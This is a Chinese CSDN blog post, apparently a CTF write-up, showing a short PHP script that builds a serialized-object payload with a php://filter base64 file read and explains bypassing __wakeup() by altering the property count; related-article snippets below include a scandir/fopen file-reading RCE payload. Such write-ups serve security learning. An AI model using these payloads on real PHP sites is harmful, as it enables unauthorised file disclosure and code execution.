PHP反序列化

最新推荐文章于 2024-01-24 09:21:44 发布
最新推荐文章于 2024-01-24 09:21:44 发布
阅读量147 收藏
点赞数
分类专栏: web安全 php 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kinnisoy/article/details/127177862
版权

PHP反序列化
如题在这里插入图片描述
第二个类没用到,只是用来示例。
第一个类在反序列化的时候调用__construct,通过绕过__wakeup(),直接执行__destruct()
payload:

<?php
    class body{
    private $todonothing = "f14g.php";
	private $want = "php://filter/read=convert.base64-encode/resource=f14g.php";
}
    $obj = new body();
    $poc = urlencode(serialize($obj));
	//$poc = serialize($obj);
	echo $poc;
?>

输出payload后,修改参数数量,绕过__wakeup()

kinnisoy
关注
专栏目录
渗透测试-PHP反序列化及绕过
cdyunaq的博客
04-26 4507
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
原理+实践学习(PHP反序列化和Session反序列化)
Lemon's blog
05-04 3102
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的...
反序列化__wakeup()绕过
最新发布
csjjjd的博客
01-24 768
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
攻防世界Web进阶区unserialize3题解
B_cecretary的博客
06-26 1112
题目源码中告诉我们flag在f14g.php中,所以我们想要进入这个文件,那么payload需要满足: 1、不含有preg_match中过滤的字符串或者直接绕过preg_match函数 2、反序列化时绕过wakeup函数 所以我们用序列化的方式构造一个var传入,让变量的value等于f14g.php,那么变量销毁时就会通过析构函数显示f14g.php构造payload代码:...
[SWPUCTF 2022 新生赛] 刷题记录
rev1ve的博客
08-12 1705
SWPUCTF 2022 新生赛 若调用类中的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6349
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-16
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
php反序列化例题.docx
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化和反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
详解php反序列化
10-15
PHP反序列化PHP编程中的一个重要概念,它涉及到将PHP变量从一种状态转换成另一种状态,即从内存中的表示形式转换成能够在文件或数据库中持久保存的格式,然后再将其还原回内存状态的过程。序列化操作可以通过PHP的...
php反序列化construct绕过,PHP反序列化漏洞(1)
weixin_39730801的博客
03-11 1765
PHP反序列化漏洞(1)背景Serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。常见方法__construct()//创建对象时触发__destruct() //对象被销毁时触...
php反序列化绕过,【技术分享】PHP反序列化漏洞
weixin_36239768的博客
03-19 503
前言序列化给我们传递对象提供了一种简单的方法serialize()将一个对象转换成一个字符串unserialize()将字符串还原为一个对象。此类函数的使用本身没有危害,但是传入反序列化函数的字符串用户可控的时候就会存在漏洞——PHP对象注入正文POP链序列化的关键在于能够在目标代码当中找到一条可以控制的POP链,POP链就是class A调用了class B的方法,class B还调用了其他方法...
攻防世界 web php include,攻防世界web进阶1-12总结篇
weixin_33415023的博客
03-09 186
1.baby_web访问页面跳转到1.php,burp抓包防止跳转,flag藏在响应头里面2.Training-WWW-Robots爬虫协议,直接得flag3.Web_php_unserializevar传参,需要注意三点:1.想要访问f14g.php,就要反序列化f14g.php2.CVE漏洞绕过__wakeup,成员数设置要大于原来的成员数3.正则绕过,对象长度之前添加一个+号可以绕过最后别忘...
CTFweb篇-反序列化和SESSION(一)
weixin_44597701的博客
08-09 1105
前面讲到过一点SESSION,这里要继续说一点 SESSION的几种形式 这里是binary session的形成方法可以在php.ini中设置。默认是php(可能是php_serialize) 例子: php形式: php_serialize形式: php_binary: ini_set() ini_set ( string $varname , string $newvalue ) 在配置文件中设置配置的值 ini_set('session.serialize_handles','php')
PHP弱等于(==)绕过和is_number()函数的绕过
weixin_43836806的博客
07-14 3336
php中的等于判断有弱等于(==)和强等于(===) 弱等于判断的时候,先是将类型转换成相同的,在进行比较 强等于
NISACTF_WriteUp
热门推荐
The code way of kinnisoy
03-28 1万+
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
PHP_RCE
The code way of kinnisoy
03-22 4212
常用函数: system(); scandir(); fopen("",""); url代码执行payload /?url= $g=scandir(%22../../../%22)[7]; $f=fopen(%22../../../$g%22,%22r%22); while(!feof($f)) { echo%20 fgetc($f); }// %20 %22 "
php 序列化与魔术方法__wakeup(),__sleep()等
The code way of kinnisoy
01-19 727
一、介绍 这两个方法是在对象的序列化与反序列话里使用的,当序列化serialize对象时,可以把对象里的属性和方法转换成连续的bytes数据,保存在一个文件里或者在网络上传输,当需要使用这个对象时,就可以反序列话unserialize这个字符串,得到这个对象,然后继续使用。   当对一个对象序列化时,php就会调用__sleep方法(如果存在的话),在反序列化时,php就会调用__wakeup...
exec/exec2命令执行
The code way of kinnisoy
10-29 658
题目给到源码 <?php $ip = isset($_POST['ip'])?$_POST['ip']:die(); if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){ die("ip 格式错误!"); } echo strlen($ip); if(strlen($ip)<7||strlen($ip)>21){ die("ip 长度错误!"); } // Determine OS and exec
深入理解PHP反序列化机制
"PHP 反序列化详解,包括serialize()函数的使用、序列化的概念和示例,以及PHP反序列化格式的解析。" 在PHP中,反序列化是一个至关重要的概念,它允许我们把之前通过序列化过程保存的字节流(通常是存储在文件或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kinnisoy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值